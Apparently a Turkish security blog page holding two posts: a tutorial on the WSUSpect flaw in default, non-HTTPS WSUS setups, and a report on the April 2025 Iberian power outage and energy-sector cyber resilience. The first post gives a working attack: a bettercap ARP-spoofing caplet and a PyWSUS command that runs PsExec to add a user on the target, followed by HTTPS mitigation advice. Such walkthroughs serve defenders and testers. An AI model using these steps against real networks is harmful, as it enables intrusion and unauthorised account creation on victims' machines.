WSUS'un Varsayılan Yapılandırılmasının Sömürülmesi - WSUSpect Zafiyeti 

Yazar: Ekrem Can KÖK

2015'te BlackHat konferansında tanıtılan "WSUSpect" zafiyeti, Windows Update Service (WSUS) ile ilgili bir güvenlik açığı olup, saldırganların bir organizasyonun Windows güncelleme altyapısını hedef alarak kurumsal ağlarını ele geçirmelerine olanak tanımaktadır. Bu yazıda, WSUSpect zafiyetinin teknik detaylarını, bu açığın nasıl sömürüleceğini, bunun için gereken araçları ve bu zafiyetin önüne geçmek için gerekli çözüm yolunu anlatacağız.

WSUSpect Zafiyeti Nedir?

WSUS (Windows Server Update Services), Microsoft'un bir kurumsal ağda istemci makinelerinin Windows güncellemelerini merkezi bir şekilde almasını sağlamak için kullandığı bir yazılımdır. Bu yazılım, kullanıcıların güncellemeleri manuel olarak yüklemelerini engeller ve güvenlik güncellemeleri ile yamaların dağıtımını otomatikleştirir.

WSUS yazılımı ilk kurulumda SSL kurulumunu zorunlu tutmaz o yüzden ilk kurulumda WSUS güncelleme dosyaları için değil, yalnızca meta veriler için SSL kullanımı gerçekleştirir. Burada her güncelleme için bir karma hesaplanır ve meta verilerle birlikte gönderilir. Bir güncelleme indirildiğinde, WSUS dijital imzayı ve karmayı kontrol eder. Güncelleme değiştirilmişse, yüklenmez.

Varsayılan kurulumda SSL zorunlu tutulmadığı için WSUS saldırganlar tarafından kötüye kullanılabilecek bazı güvenlik açıklarını barındırır. WSUSpect zafiyeti, bu güvenlik açıklarını kullanarak saldırganların hedef sistemlere güncelleme gerçekleştirme, kötü amaçlı yazılım veya yama entegre etmelerini sağlar. Böylece saldırgan, hedef makineler üzerinde komut çalıştırma, güncelleme almasını engelleme ve servis dışı bırakma vb. zafiyetleri tetikleyebilir.

WSUS sunucusu başlangıç kurulumunda bırakıldığında SSL yapılandırılması olmadığı için sunucuya SSL sertifika kurulmadan kullanılırsa zafiyete açık hala gelir. Saldırgan ortadaki Adam Saldırısı (MITM) ile araya girerek trafiği dinleyebilir ve isteği şekilde değiştirebilir. Bu sayede kötü amaçlı meta verileri ve istenilen güncelleme dosyası sisteme enjekte edilebilir.

Güncelleme gerçekleştirilirken istemci ve sunucu arasında meta veri paylaşımı yapılır. Bu paylaşım yapılırken SOAP protokolü kullanılır. Saldırgan burada SSL olmamasından kaynaklı MITM saldırısı ile SOAP üzerindeki belirli istekleri değiştirerek. Meta veri doğrulamasının atlatılması ve kendi payload’larının karşı makine üzerinde çalıştırılmasını sağlar.

WSUS yazılımı kullanımında SyncUpdates ve GetExtendedUpdateInfo istekleri ve yanıtları yakalanıp değiştirilerek WSUSpect zafiyeti tetiklenmektedir ve Windows’un güncellemenin doğruluğunu kontrol ettiği meta veri önlemi atlatılabilmektedir. Aşağıda bu isteklere ve yanıtlara ait zafiyetlerin bulunduğu kod blokları verilmiştir.

GetExtendedUpdateInfo Response

CommandLineInstallation

Edited CommandLineInstallation

Yukarıdaki kod blokları incelendiğinde öncelikle “GetExtendedUpdateInfo” isteği iletildiğinde bize yukarıdaki gibi bir kod döndürdüğü gözlemlenmiştir. Burada <FileLocations> tagl’eri arasında belirli bir URL parametresi döndüğü ve xml tagleri arasında ise meta verisinin döndüğü gözlemlenmiştir. MITM işlemi gerçekleştirilerek dönen yanıt üzerindeki değerleri değiştirerek farklı bir URL üzerinden PsExec64.exe dosyasını indirme işlemi gerçekleştirebiliriz.

Daha sonrasında CommandLineInstallation isteği üzerinde <HandlerSpecificData değeri görülmektedir. Burada çalıştırılan exe dosyası diğer resimdeki gibi indirdiğimiz PsExec dosyası çalıştırılacak şekilde düzenlenebilir ve CMD ile bir whoami komutu çalıştırılabilir bu sayede hedef makine üzerinde komut çalıştırma işlemi gerçekleştirilebilir.

Zafiyetin sömürülmesi sırasında burada anlatılan işlemlerin otomatik olarak gerçekleştirilmesi için Python ile kodlanan PyWSUS uygulamasını kullanarak zafiyeti tetikleyeceğiz.

Zafiyetin Sömürülmesi

Zafiyet incelendiğinde Windows’un belirli dosyalarının imzalı olduğu ve çalıştırılabildiği gözlemlenmiştir. Bunlarda bilinenlerde biri CMD diğerleri de SysInternals araçlarıdır. Bunlar kullanılarak makine üzerinde komut çalıştırılabilmektedir.

Zafiyeti tetikleme karşı makinede psexec’i tetikleyerek, çalıştırma işlemi gibi birçok işlemi bizler için PyWSUS yazılımı otomatik olarak gerçekleştirmektedir.

Zafiyet sömürme kısmında da sömürmek için gerekli olan PyWSUS ve Bettercap aracını kullanarak zafiyetin nasıl sömürüleceğini göstereceğiz.

Pywsus aracını PyWSUS adresi üzerinden indirerek kurulumunu gerçekleştirebilirsiniz.

Örnek saldırı senaryosunda;

·        Saldırgan IP: 192.168.1.150

·        Hedef IP: 10.10.10.150

Öncelikle MITM saldırısının düzgün şekilde gerçekleştirebilmek için bettercap uygulamasına bir config dosyası yazılması gerekmektedir. Aşağıdaki şekilde bir wsus.cap dosyası oluşturarak hedef ip adresine gelen tüm trafiği 8530 portu (WSUS uygulamasının varsayılan portu olduğu için kullanılmıştır) üzerinden kendimize yönlendirme işlemi gerçekleştirebiliriz.

wsus.cap

    set arp.spoof.targets 10.10.10.150
    arp.spoof on
    set any.proxy.src_port 8530
    set any.proxy.dst_port 8530
    set any.proxy.dst_address 192.168.1.150

Dosyayı düzenledikten sonra <code>bettercap --iface interface --caplet wsus.cap </code> komutunu çalıştırarak MITM için dinleyici ve yönlendirme işlemini başlatmış oluyoruz. Aynı anda pywsus aracı ile de aşağıdaki komutu çalıştırıyoruz.

<code> python pywsus.py -H 192.168.1.150 -p 8530 -e PsExec64.exe -c ‘/accepteula /s cmd.exe /c “net user btyon btyon /add”‘</code> komutunu da vererek makinemizin 8530 portuna gelen istekleri editleyerek karşı makinede CMD ile komut çalıştırılmasını ve btyon adında bir kullanıcı eklemesini sağlayan kodu gönderiyoruz.

Bu sayede saldırgan makine üzerinde dinleyici ve pywsus yazılımı aktif haldeyken hedef makine üzerinden bir güncelleme işlemi yapılmaya çalışıldığında bizim gönderdiğimiz komut çalıştırılmakta ve makine üzerinde bir kullanıcı oluşturma işlemi gerçekleştirilmektedir.

Önlemler ve Savunma

Bu zafiyeti önlemenin en iyi yolu, WSUS dağıtımları kullanılırken HTTP yerine şifrelenmiş güvenli bir iletişim yöntemi olan HTTPS kullanılmasıdır. WSUS dağıtımı varsayılan ayarlarında yapılandırıldıktan sonra ek olarak SSL yapılandırılmasının da gerçekleştirilmesi gerekmektedir.

Burada SSL/TLS sertifikalarının güvenli şekilde yapılandırılarak zayıf algoritmalar kullanılmamalı ve WSUS’un HTTPS üzerinden iletişim kurması zorunlu hale getirilmelidir.

Teşekkürler,

 

28 Nisan 2025 İspanya, Portekiz ve Fransa’da Milyonları Etkileyen Geniş Çaplı Elektrik Kesintisi

Yazar: Mert Umul

28 Nisan 2025 Pazartesi günü, İspanya ve Portekiz’i etkileyen geniş çaplı bir elektrik kesintisi milyonlarca insanın hayatını durma noktasına getirdi. Öğle saatlerinde başlayan kesinti, Madrid, Barselona, Lizbon gibi büyük şehirlerde hayatı felç etti. Trafik ışıkları söndü, trenler ve metrolar durdu, havaalanlarında uçuşlar aksadı, ATM’ler devre dışı kaldı, internet bağlantısı ve mobil iletişim hizmetleri çöktü. Madrid Açık Tenis Turnuvası’nda maçlar askıya alındı, restoranlar mum ışığında hizmet vermeye çalıştı. Şehir merkezlerinde yoğun trafik ve yaya kaosu yaşandı.

İspanya İçişleri Bakanlığı ulusal acil durum ilan ederek ülke genelinde 30 bin polis görevlendirildi. Hükümet yetkilileri acil kabine toplantıları düzenlerken, Başbakan Pedro Sánchez halka acil durum hatlarını sadece mecbur kalındığında aramaları çağrısında bulundu. Portekiz Başbakanı Luís Montenegro ise ülkesindeki tüm devlet kurumlarının çalışmaya devam ettiğini, ancak durumun ciddi olduğunu açıkladı.

Kesintinin nedeni başlangıçta belirsizliğini korudu. Ancak kısa süre içinde İspanyol enerji şebekesi operatörü Red Eléctrica (REE) ve Portekizli muadili REN, olayın İspanya'daki bir teknik arıza tarafından tetiklendiğini bildirdi; Portekizli yetkililer ise, İspanya iç bölgelerindeki ani sıcaklık değişimlerinin 400 kV’lik yüksek gerilim hatlarında "atmosferik titreşim"e yol açtığını ve bunun Avrupa'nın bağlı elektrik şebekelerinde frekans dengesizliğine neden olarak zincirleme santral kapanmalarını tetiklediğini belirtti. Avrupa standartlarına göre 50Hz olması gereken şebeke frekansının düşmesi sonucu, Fransa dahil birçok bölgede enerji arzı geçici olarak kesildi.

Siber saldırı ihtimali gündeme gelse de, hem İspanya hem de Portekiz yetkilileri böyle bir bulguya ulaşamadıklarını belirttiler. Yine de İspanya Ulusal Güvenlik Konseyi toplantıya çağrılarak olası tüm senaryoları ele aldı. Avrupa Komisyonu yetkilileri de olayın bir sabotaj değil, doğa koşullarından kaynaklı bir teknik arıza olduğu yönünde ilk bulguları paylaştı.

Kesinti başladığında, Madrid ve Barselona gibi büyük kentlerde binlerce kişi toplu taşıma araçlarında mahsur kaldı. Trafik ışıklarının devre dışı kalması şehir içi ulaşımı felç etti, marketlerde ve ATM'lerde uzun kuyruklar oluştu. Elektronik ödeme sistemleri çöktüğü için birçok iş yeri yalnızca nakit ödeme kabul etmek zorunda kaldı. Bazı bölgelerde su pompalarının devre dışı kalması nedeniyle içme suyu erişiminde aksamalar yaşandı. İnternet ve mobil iletişim ağlarında kesintiler meydana geldi. Madrid ve Barselona’da insanlar sokaklara döküldü; metrolar çalışmayınca, çoğu evine yürüyerek dönmek zorunda kaldı.

İlk saatlerin ardından, Red Eléctrica kuzeyde Bask bölgesi, doğuda Barselona ve güneyde Endülüs gibi bölgelere kademeli olarak elektrik vermeye başladı. Saatler ilerledikçe ülke genelindeki enerji arzı yeniden toparlandı. Pazartesi gecesi itibarıyla İspanya’nın %61’inde elektrik sağlandı. Salı sabahı 6:00 itibarıyla ise İspanya'nın %99,16'sında enerji yeniden verilmişti.

Portekiz’de de benzer bir süreç yaşandı. REN, gece yarısından önce 85 ana enerji istasyonunun tamamında elektrik arzını yeniden sağladı. Ancak Lizbon’un bazı bölgelerinde ve güneydeki Portimão gibi şehirlerde kesintiler gece boyu devam etti. Metro hatları ve tren seferleri sabah saatlerinde kısmi olarak tekrar açıldı. Madrid metrosu sabah 8:00 itibarıyla %80 kapasiteyle çalışmaya başladı.

Uzmanlar, yaşanan kesintinin Avrupa'nın elektrik ağlarının düşündüğümüz kadar sağlam olmadığını bir kez daha gösterdiğini ifade etti. Geçmişte benzer sorunlar 2003'te İtalya’da, 2006'da Almanya’da ve 2015’te Türkiye’de milyonlarca insanı etkilemişti. İspanya ve Portekiz hükümetleri, olayın teknik analizinin tamamlanmasının ardından ilave önlemler alınacağını açıkladı.

Avrupa’daki bu kesinti, Türkiye’nin 31 Mart 2015’te yaşadığı benzer bir olayı da hatırlattı. O tarihte ülke genelinde yaşanan büyük elektrik kesintisi, Kıta Avrupası sisteminde son 15 yılın üçüncü büyük arızası olarak kayda geçti. ENTSO-E ve TEİAŞ tarafından yayımlanan rapora göre, sorun frekans sapmaları, aşırı yüklenmeler ve santral tepkilerinden kaynaklanmıştı. Ancak hızlı müdahale ve yedekli sistemler sayesinde kriz yalnızca Türkiye ile sınırlı kaldı; komşu ülkeler etkilenmedi. Mobil iletişim hizmetleri kesinti süresince çalışmaya devam etti, hava trafiği etkilenmedi. Bu olayla ilgili detaylar 31 Mart 2015 sistem çökmesi raporunda yer almaktadır.

Yaşananlar sadece büyük çaplı bir enerji kesintisi değil, aynı zamanda dijital güvenliğin enerji altyapıları için ne kadar kritik hale geldiğini hatırlatan bir uyarıydı. Her ne kadar olayın sebebi teknik bir arıza olsa da, siber saldırı ihtimali ciddiyetle değerlendirildi ve bu da altyapıların dijital tehditlere karşı ne kadar savunmasız olabileceğini ortaya koydu.

Bugün enerji sistemleri, karmaşık dijital kontrol altyapılarıyla (ICS/SCADA) yönetiliyor ve bu sistemler siber saldırganlar için giderek daha cazip hedefler haline geliyor. 2015’te Ukrayna’da 225 bin kişiyi elektriksiz bırakan saldırı, bu riskin gerçekliğini net şekilde göstermişti.

Bu riskler Türkiye’de de uzun süredir gündemde. Enerji Piyasası Düzenleme Kurumu (EPDK), enerji sektöründe faaliyet gösteren iletim, dağıtım ve tedarik şirketlerinin dijital tehditlere karşı hazırlık düzeyini artırmak amacıyla “Siber Güvenlik Yetkinlik Modeli”ni (SYYM) hayata geçirdi. Bu model, şirketlerin bilgi güvenliği, olay müdahalesi, kriz anı iletişimi, personel farkındalığı, sistem yedekliliği ve siber risk yönetimi gibi alanlardaki kurumsal olgunluk seviyelerini değerlendirmeyi ve bu alanlarda gelişim sağlamayı hedefler. Model, uluslararası standartlarla (ISO 27001, NIST, IEC 62443) uyumlu olacak şekilde yapılandırılmış olup; şirketlerin düzenli olarak sızma testleri gerçekleştirmesini, bu testlerin sonuçlarını belgeleyerek EPDK’ya raporlamasını zorunlu kılar. Ayrıca ağ segmentasyonu, erişim kontrolü, olay müdahale planları ve iş sürekliliği gibi başlıklarda da somut tedbirler alınmasını teşvik eder. Böylece yalnızca teknolojik çözümler değil, yönetişim, süreç yönetimi ve insan kaynağı boyutlarıyla da bütüncül bir siber dayanıklılık yaklaşımı benimsenmiş olur.

Operasyonel teknoloji (OT) ağları, geleneksel IT güvenlik önlemleriyle tam olarak korunamaz; daha özel ve derinlemesine bir yaklaşım gerektirir. Birçok OT sistemi hâlâ güncel olmayan yazılımlar üzerinde çalıştığı için, sıfırıncı gün açıkları gibi ciddi güvenlik risklerine açıktır. İnternete bağlı olmasalar bile, genellikle “air-gapped” yani izole kabul edilen bu sistemlerde dahi sızma testlerinin düzenli olarak yapılması gerekir. Çünkü bu testler sayesinde, dışarıdan sağlam görünen sistemlerin hangi noktalardan istismar edilebileceği önceden tespit edilerek zamanında önlem alınabilir.

Güvenliği artırmak için ağ segmentasyonu, yapay zekâ destekli anomali tespiti, otomatik müdahale sistemleri ve yedekli altyapı tasarımları devreye alınmalı. Kritik bölgelerdeki arızaların tüm sistemi etkilemesini engellemek için bölgesel izolasyon çözümleri uygulanmalıdır.

Siber dayanıklılık için sistemlerin güncel tutulması, yazılım yamalarının vakit kaybetmeden uygulanması, düzenli sızma testleriyle güvenlik açıklarının proaktif şekilde tespit edilmesi ve riskli eski protokollerin kademeli olarak devreden çıkarılması büyük önem taşıyor. Her kurumun kapsamlı bir acil durum planı hazırlaması ve bu planları gerçekçi senaryolarla test etmesi artık bir tercih değil, zorunluluk haline geldi. Çünkü siber güvenlik yalnızca teknik değil, aynı zamanda organizasyonel bir sorumluluktur. Personel eğitimi, rol bazlı yetki kontrolleri ve kriz anında nasıl iletişim kurulacağına dair net protokoller bu işin temel taşlarıdır.

Yaşananlar ilk bakışta basit bir teknik arıza gibi görünse de, aslında modern enerji sistemlerinin ne kadar karmaşık, birbirine bağlı ve bazı durumlarda savunmasız olabileceğini gözler önüne serdi. Bu durum, sadece Avrupa’yı değil, dünya genelindeki tüm enerji altyapılarını da ilgilendiren önemli bir uyarı niteliğinde. Her şirket aynı düzeyde risk taşımıyor olabilir, ancak bu olay, sistemler arasındaki bağımlılığın ve dış etkenlerin ne kadar geniş çaplı sonuçlar doğurabileceğinin somut bir örneği oldu. Bu nedenle, sadece Avrupa değil, tüm enerji sektörü dijital güvenlik ve operasyonel dayanıklılık konularında daha hazırlıklı olmalı. Standartlar gözden geçirilmeli ve olası senaryolara karşı planlar güncellenmelidir. Çünkü dijital çağda güvenli ve kesintisiz bir altyapı artık sadece bir tercih değil, herkesin sorumluluğu.